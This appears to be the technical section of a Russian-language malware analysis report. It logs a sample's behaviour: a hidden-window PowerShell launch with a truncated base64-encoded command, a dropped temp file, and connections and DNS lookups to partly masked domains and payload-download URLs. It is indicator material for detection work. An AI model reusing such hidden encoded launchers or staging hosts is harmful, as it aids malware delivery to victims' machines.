Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1357505.cvr
- 'ba########0-001-site5.gtempurl.com':80
- 'ho######zclubindonesia.org':80
- 'ho######zclubindonesia.org':443
- http://ba########0-001-site5.gtempurl.com/799612/IIadxvvB/
- http://www.ho######zclubindonesia.org/wp-content/HJnTOcOvw/
- 'ho######zclubindonesia.org':443
- DNS ASK bl####knetwork.com
- DNS ASK ba########0-001-site5.gtempurl.com
- DNS ASK ch###m2020.com
- DNS ASK zh###yiyi.xyz
- DNS ASK ho######zclubindonesia.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...' (со скрытым окном)